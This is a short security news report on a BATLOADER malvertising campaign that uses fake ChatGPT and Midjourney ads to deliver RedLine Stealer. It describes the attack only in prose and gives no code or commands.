Malicious Google Search advertisements are being utilized in a BATLOADER campaign to direct users to dubious websites offering generative AI services such as OpenAI ChatGPT and Midjourney. These advertisements, flagged by eSentire, exploit the popularity of these AI services which lack first-party standalone applications. The threat actors drive AI app-seekers to imposter web pages that promote fake apps.
BATLOADER, a loader malware, spreads through drive-by downloads. Users searching for specific keywords on search engines encounter fraudulent ads. Clicking on these ads redirects them to rogue landing pages hosting malware. The installer file contains an executable file and a PowerShell script that downloads and loads RedLine Stealer from a remote server. After installation, the binary uses Microsoft Edge WebView2 to load the legitimate ChatGPT and Midjourney URLs in a pop-up window, avoiding suspicion.
This isn't the first time BATLOADER's operators have exploited the AI trend to distribute malware. In March 2023, eSentire reported similar attacks using ChatGPT lures to deploy Vidar Stealer and Ursnif. The use of Google Search ads for this purpose has decreased since early 2023, indicating that measures have been taken to minimize their exploitation.
These developments are part of a broader wave of phishing and scam campaigns capitalizing on the increasing use of AI tools. Threat actors distribute malware and fake apps through these campaigns. In related research, Sophos identified ChatGPT-related fleeceware apps in the Google Play and Apple App Store, which manipulate users into signing up for unwanted subscriptions.
In January, eSentire traced one of the key operators of the malware-as-a-service (MaaS) to an individual in Montreal, Canada. The second threat actor associated with the group has been identified as a Romanian national known as Jack.